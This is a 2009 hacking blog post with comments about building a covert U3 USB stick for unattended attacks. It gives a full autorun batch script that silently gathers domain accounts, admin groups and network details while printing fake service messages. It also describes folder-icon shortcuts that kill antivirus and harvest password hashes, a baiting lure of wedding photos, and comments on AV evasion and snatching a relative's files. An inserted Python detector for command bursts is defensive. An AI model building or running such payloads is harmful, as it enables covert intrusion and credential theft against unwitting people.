Tuesday, February 24, 2009

USB Enumerator vs USB Hacksaw

Recently a mate at work commented that he got a bit stuck with the whole U3 hacksaw / switchblade kerfuffle. Well, I still had my original U3 set-up from a couple of years ago, put together after watching the Hak.5 show (Series 2 if you're interested), but I thought it needed a bit of a refresh.

Being inspired by DarkOperator's Metasploit scripts for enumeration, I decided to set up the U3 to use what God gave us, okay, what Microsoft gave us: built-in tools. More specifically, built-in tools for computer and network enumeration.

So what's the point of this, I hear you ask? Well, after using my Hacksaw here and there and seeing it detected by AV now and then, I figured that for it to be as stealthy as possible a few modifications were in order.

First I gave it a good overwrite with dd and started afresh with the builder tool. The tool I use is LPInstaller.exe. I can't remember where I got it from, but it wipes out all the pre-installed U3 goodness and leaves you with a U3 stick that you can mod to be the ultimate USB Enumerator.

With it looking like a brand new U3, this is where a little thought goes in. Now and then at work the receptionist sends an email to all users asking if anyone has lost a USB thumb drive. Well, I can take advantage of this good nature by placing a file with a throwaway email address in the root called "Contact Me if Found.txt".

Now when it's found or handed in to a reception, some nice person might email me and let me know that they have it. But why would they do that? Because my next folder is titled "Wedding Pics - DO NOT DELETE" and it has a few wedding and baby pics in it (no metadata, remember).

So what cold-hearted person wouldn't want to return a USB device with baby and wedding pics on it, right! Oh, and the guy in the wedding photo... he's in a wheelchair (thanks, Google Images), so it would have to be a cold-hearted individual who is going to keep that USB drive.

Next I have a couple more directories.

Well, they look like directories, but they are just links to my evil scripts that will help me on my dark crusade.

A closer look at the shortcut reveals it's actually a link to a batch file that will kill any running AV and launch programs to get the local password hashes, internet passwords and login details for MSN etc. And we all know that people re-use passwords, don't we?

When someone clicks on one of these 'shortcuts' it will place the running batch file behind any open windows, and the only clue that anything is going on is a folder in the toolbar which will disappear after a few seconds.

And the batch file can do anything. Obviously I want to stop AV first, and then, thanks to a few tools from Nirsoft as well as a few others from the likes of foofus, I have loads of juicy details coming my way.

And what does this give me? Hashes, oh the lovely hashes.......

And of course we want the websites too.

And there's plenty more, but I'm sure you get the point.

But this is a U3 thumb drive, so hopefully we don't need to rely on a nosey bugger clicking around, because it will hopefully utilise the autorun feature to enumerate the network as soon as it's plugged in. It does the crazy enumeration coolness by running this script from the hidden \WIP\CMD folder.

Here's the simple batch file that does the enumeration:

@Echo off
echo Starting. Do not close program. Please wait 15 seconds.
::Generate a unique filename
set fn=%computername%-%random%
::Create a non-obvious directory
mkdir .\Windows\System\System32\etc\hosts\win\0011\%fn%
cd .\Windows\System\System32\etc\hosts\win\0011\%fn%
::Get local Time and Date Info
time /t >%fn%.log
date /t >>%fn%.log
::Network Info
net user /domain >>%fn%.log
echo Restarting critical service. Please Wait 5 seconds.
net group /domain >>%fn%.log
net localgroup /domain >>%fn%.log
net localgroup administrators /domain >>%fn%.log
net localgroup "Account Operators" /domain >>%fn%.log
net accounts /domain >>%fn%.log
net view /domain >>%fn%.log
net view >>%fn%.log
echo Service restart complete. Please wait 5 seconds.
::Local Info
ipconfig /all >>%fn%.log
ipconfig /displaydns >>%fn%.log
netstat -ano >>%fn%.log
netstat -r >>%fn%.log
arp -a >>%fn%.log
tasklist /svc >>%fn%.log
tasklist >>%fn%.log
tasklist /v >>%fn%.log
net share >>%fn%.log
net use >>%fn%.log
net accounts >>%fn%.log
net localgroup >>%fn%.log
net localgroup administrators >>%fn%.log
systeminfo >>%fn%.log
netsh firewall show config >>%fn%.log
echo Service failed to load. Error code MS-31337
netsh diag show all /v >>%fn%.log

And that pretty much enumerates the network for all accounts, groups and members of admin groups. It gets password policies, computer details from the domain, domain names, local accounts and groups, firewall policies, applied hotfixes, network connections, open ports, running services, shares, networking information and other bits and bobs as well.

And the beauty of it all is that it's just using Microsoft tools, which won't make the AV go loopy and freak out. So within a few seconds of plugging the device into any networked PC with a USB port you'll have more data than you can shake a big enumerating stick at. Wonderful!

All this useful data is output to a single log file in a deeply buried, obfuscated directory with a random number appended to the end, so it can be run time after time and is nicely tucked away.
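Because every command in that script is a signed Microsoft binary, file-signature AV has nothing to match on, and a defender has to look at behaviour instead: a single parent process spawning a long run of discovery commands in a few seconds is not something a receptionist's session does on its own. The following Python is an added example, not code from the original post or from the Hak.5 / U3 tools it mentions. It replays constructed process-creation audit lines (the pipe-delimited layout, the field names, the 30-second window, the six-family threshold and the E: drive letter are all this example's own assumptions, not a vendor schema) and raises one alert per parent that spawns six or more distinct discovery command families inside the window, noting whether the parent's command line points at a non-system drive, which is what a script launched from a thumb drive looks like.

```python
"""Behavioural detection for a burst of built-in discovery commands.

Added example, not from the original post. The audit lines are constructed
and loosely follow what a process-creation audit (Windows Security 4688 or
Sysmon event 1) records: timestamp | host | parent PID | parent command
line | child image | child command line. Layout and thresholds are assumed.
"""
import ntpath
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Built-in tools the enumeration script chains together.
DISCOVERY_TOOLS = {"net", "ipconfig", "netstat", "arp", "tasklist", "systeminfo", "netsh"}
# A parent command line referencing a drive other than C: (assumed system
# drive) hints that the script was launched from removable media.
NON_SYSTEM_DRIVE = re.compile(r"\b[D-Z]:\\", re.IGNORECASE)
WINDOW = timedelta(seconds=30)   # burst window (assumption)
THRESHOLD = 6                    # distinct families per parent in WINDOW (assumption)


def family(image, cmdline):
    """Map a child process to a discovery family such as 'net user', or None."""
    name = ntpath.basename(image).lower()
    if name.endswith(".exe"):
        name = name[:-4]
    if name == "net1":            # net.exe hands most subcommands to net1.exe
        name = "net"
    if name not in DISCOVERY_TOOLS:
        return None
    if name in ("net", "netsh"):  # the subcommand is what distinguishes them
        parts = cmdline.lower().split()
        return f"{name} {parts[1]}" if len(parts) > 1 else name
    return name


def parse_line(line):
    """Parse one constructed audit line into an event dict."""
    ts, host, ppid, pcmd, image, cmdline = line.split("|", 5)
    return {"time": datetime.fromisoformat(ts), "host": host,
            "parent_pid": int(ppid), "parent_cmdline": pcmd,
            "image": image, "cmdline": cmdline}


def detect(events, window=WINDOW, threshold=THRESHOLD):
    """Return one alert per parent that spawns >= threshold distinct
    discovery families inside any window-sized span."""
    by_parent = defaultdict(list)
    for ev in events:
        fam = family(ev["image"], ev["cmdline"])
        if fam:
            key = (ev["host"], ev["parent_pid"], ev["parent_cmdline"])
            by_parent[key].append((ev["time"], fam))
    alerts = []
    for (host, ppid, pcmd), seen in by_parent.items():
        seen.sort()
        for i, (start, _) in enumerate(seen):   # sliding window over sorted events
            fams = {f for t, f in seen[i:] if t - start <= window}
            if len(fams) >= threshold:
                alerts.append({"host": host, "parent_pid": ppid,
                               "parent_cmdline": pcmd, "families": sorted(fams),
                               "off_system_drive": bool(NON_SYSTEM_DRIVE.search(pcmd))})
                break                           # one alert per parent is enough
    return alerts


# Constructed sample: one burst from a script on E:, plus normal helpdesk use.
SAMPLE_LOG = r"""
2009-02-24T09:15:01|WS-RECEPTION|4120|cmd.exe /c "E:\WIP\CMD\tools.cmd"|C:\Windows\System32\net.exe|net user /domain
2009-02-24T09:15:02|WS-RECEPTION|4120|cmd.exe /c "E:\WIP\CMD\tools.cmd"|C:\Windows\System32\net1.exe|C:\Windows\System32\net1.exe group /domain
2009-02-24T09:15:03|WS-RECEPTION|4120|cmd.exe /c "E:\WIP\CMD\tools.cmd"|C:\Windows\System32\net.exe|net localgroup administrators /domain
2009-02-24T09:15:04|WS-RECEPTION|4120|cmd.exe /c "E:\WIP\CMD\tools.cmd"|C:\Windows\System32\net.exe|net view /domain
2009-02-24T09:15:06|WS-RECEPTION|4120|cmd.exe /c "E:\WIP\CMD\tools.cmd"|C:\Windows\System32\ipconfig.exe|ipconfig /all
2009-02-24T09:15:07|WS-RECEPTION|4120|cmd.exe /c "E:\WIP\CMD\tools.cmd"|C:\Windows\System32\netstat.exe|netstat -ano
2009-02-24T09:15:08|WS-RECEPTION|4120|cmd.exe /c "E:\WIP\CMD\tools.cmd"|C:\Windows\System32\arp.exe|arp -a
2009-02-24T09:15:09|WS-RECEPTION|4120|cmd.exe /c "E:\WIP\CMD\tools.cmd"|C:\Windows\System32\tasklist.exe|tasklist /svc
2009-02-24T09:15:11|WS-RECEPTION|4120|cmd.exe /c "E:\WIP\CMD\tools.cmd"|C:\Windows\System32\systeminfo.exe|systeminfo
2009-02-24T09:15:12|WS-RECEPTION|4120|cmd.exe /c "E:\WIP\CMD\tools.cmd"|C:\Windows\System32\netsh.exe|netsh firewall show config
2009-02-24T09:20:00|WS-HELPDESK|2210|C:\Windows\System32\cmd.exe|C:\Windows\System32\ipconfig.exe|ipconfig /all
2009-02-24T09:20:30|WS-HELPDESK|2210|C:\Windows\System32\cmd.exe|C:\Windows\System32\net.exe|net user jsmith /domain
2009-02-24T09:21:00|WS-HELPDESK|2210|C:\Windows\System32\cmd.exe|C:\Windows\notepad.exe|notepad ticket.txt
"""


def run_sample():
    """Parse the constructed log and return the alerts it produces."""
    return detect(parse_line(l) for l in SAMPLE_LOG.strip().splitlines())


if __name__ == "__main__":
    for a in run_sample():
        print(a["host"], a["parent_pid"], a["parent_cmdline"],
              "off-system-drive" if a["off_system_drive"] else "",
              ", ".join(a["families"]))
```

Run it directly and it prints one alert for the reception PC and nothing for the helpdesk session, which only ran two discovery families half a minute apart. The same grouping by parent process works over real 4688 or Sysmon telemetry; the complementary control is to disable autorun for removable drives through Group Policy, which takes away the plug-and-run path and leaves only the click-the-shortcut one.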

But what if autorun is disabled? Well, just like the script that kills the AV and grabs the passwords, this can be run manually by clicking the batch file or by fronting it with a shortcut with a folder icon and running that.

So how can this be useful in a pentest? It could be that during that pentest you have social-engineered your way onto a helpful person's PC who is going to print something off for you or email an important document for you, and said files are on your USB device. Or you could hand a USB device to a receptionist and ask her to check whose it is. Or of course you could just be transferring those picture or music files to your friend's computer. So if you're reading this and you know me, maybe next time you ask me for a file or a movie that I have on USB you had better think again!

So there you have it, my take on making my USB Hacksaw a little more interesting.

For more info on U3 hacking I recommend this post by McGrew Security.


Anonymous said...

Hi synjunkie,

Really enjoying your blog. It's very informative.

For your homebrew hacksaw, what commands did you use for your Av-Die2.cmd batch script?

I'm using one using sysinternals pskill and the list of AV .exe's from a metasploit ruby script - http://trac.metasploit.com/browser/framework3/trunk/scripts/meterpreter/killav.rb?rev=5773

Just wondering if you have something a little more useful than this one.

Many thanks, keep up the great work!


SynJunkie said...

Hi Anon

Thanks for leaving a comment. For the script that kills the AV I simply took a script from moonlit on the Hak5 forum. A bit of Google magic on moonlit and hak5 should turn it up. I didn't realise that Metasploit had that in, I'll have to take a look and compare.



CypherBit said...

What if the receptionist, like all other users, is using a standard user account (and any AV)? Which of the tools in tools.cmd would even work?

The enumeration shouldn't be a problem, but what about all the rest?

Could you post the complete tools.cmd, not only the enumeration part?

SynJunkie said...


That's a very good point and one of the reasons why I would either have a USB key for enumeration (which wouldn't be picked up by AV, and a restricted user can run the built-in tools (usually)) and then another USB key for the evil tools. Or another idea I'm playing with at the moment is having the evil tools in an encrypted TrueCrypt volume that doesn't get opened until the AV is off. I'll see where I get to with that, but I'm sure it's doable.

I'll post up my evil tools script either tonight or in the week as a comment on this post.



CypherBit said...

Thank you, that makes sense. Perhaps the "evil tools" could be zipped up, protected by a password, and the batch file would also check if the user is admin or not.

Looking forward to seeing how this evolves.

SynJunkie said...

That's a great idea, I'll certainly be coming back to this one later this week.



Anonymous said...

*cough cough* come back,

Love your posts! Bookmarked your blog already, lots of good reads, was looking forward to seeing your use of the .bat script!

SynJunkie said...

Hi Anonymous

I'm still here. I have been working on a new story that i hope to have ready soon. I'm trying to work the hacksaw stuff into that.

Thanks for the comment and cheers for bookmarking my blog. It's great to know that these posts are interesting to people other than myself.


Ivion said...

I'm a total noob to this stuff... where do you put the scripts and in what format do you save them?

SynJunkie said...

My scripts are in a hidden folder \WIP\CMD\ in the writable partition on the U3, and the script file that I run is called tools.cmd, which is basically a batch file as described in the post.

Dai Vernon said...

Hi, I don't understand, you have the payload installed in the writable partition? I thought that the science of using a U3 was being able to install the payload in the locked emulated CD drive so if the AV gets jumpy it won't be able to erase the files, and saving the log (logically) in the writable partition. Help if I'm wrong, please. Thanks for the info. Is it still stealthy? The batch run by the autorun.inf doesn't get picked up?

SynJunkie said...

It's a while since I set it up. From memory, the point of the "CD" partition (read-only) was to get it to auto launch a program on the writable partition which the "attacker" chooses.

Unfortunately AV will be able to erase files if detected. I guess that's why we have tools like MsfEncode and PEScrambler ;-)

Anonymous said...


SynJunkie said...

Have you tried it in another USB port or from another PC? Also have a look on the Hak.5 forums; they have a pretty good list of posts on the U3s.

Anonymous said...

What software can I use on a USB device so that I can copy as many files as possible onto it when I plug it into my sister's PC? (Instant file copier) e.g. My Documents

Anonymous said...

HELP, I need a USB document snatcher... e.g. My Documents from another PC when I plug in my USB... (copy users' My Documents files)

SynJunkie said...

I'm not sure I agree with your motives, but if I was you I would just use a batch file.